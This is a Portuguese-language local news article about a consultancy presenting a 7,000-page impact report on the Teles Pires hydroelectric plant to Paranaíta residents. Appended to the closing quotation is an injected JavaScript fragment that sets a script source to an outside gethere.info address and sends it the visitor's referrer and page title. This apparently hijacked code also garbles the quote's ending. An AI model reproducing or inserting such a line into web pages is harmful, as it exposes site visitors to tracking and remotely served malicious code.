Capa / Em Destaque / Empresa apresenta relatório de impacto em Paranaíta e Alta Floresta com mais de sete mil páginas

Empresa apresenta relatório de impacto em Paranaíta e Alta Floresta com mais de sete mil páginas

DSC_0012Da Redação

A empresa G. Andrade Auditoria e Consultoria comandou uma audiência pública realizada ontem em Paranaíta e apresentou um relatório sintetizado dos trabalhos que tiveram inicio em 2013 e que visam dar um diagnóstico sobre o nível do impacto Social, Econômico e Ambiental em função da instalação da Usina Hidrelétrica Teles Pires no município de Paranaíta. O relatório com mais de 7.000 páginas analisou as mesmas condições para o município de Alta Floresta, porém, ontem foram apresentados apenas dados relativos à Paranaíta.

Segundo dr João Vieira Andrade, houve um atraso para a entrega do trabalho em função de duas situações, primeiro um atraso de 6 meses para iniciar as atividades, segundo, por uma série de problemas de saúde que ele passou, cuja recuperação demorou em torno de 7 meses. “O pessoal trabalhando, mas sem um resultado final, como a minha empresa é uma empresa individual ela depende muito de mim para ter sequencia”, justificou, afirmando que a consultoria já está pronta há três meses.

A consultoria foi contratada pelo Companhia Hidrelétrica Teles Pires, em respeito a um acordo no começo da construção em 2011. Cópias da consultoria foram repassadas para a Companhia Hidrelétrica Teles Pires, para as duas prefeituras e para o Ministério Público. Segundo Dr João, nos próximos 45 dias devem ser feitas novas reuniões, desta vez com a participação da CHTP, tendo já em mãos o seu parecer em torno do relatório.

“A conclusão deste relatório vai permitir que as partes sentem e peguem este fundo garantidor e faça, não vai fazer nem tudo o que Paranaíta quer? Provavelmente não, nem tudo o que Alta Floresta quer? Provavelmente não, mas nem tudo o que a usina quer? Provavelmente não, eles vão ter que chegar num denominador comum”s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top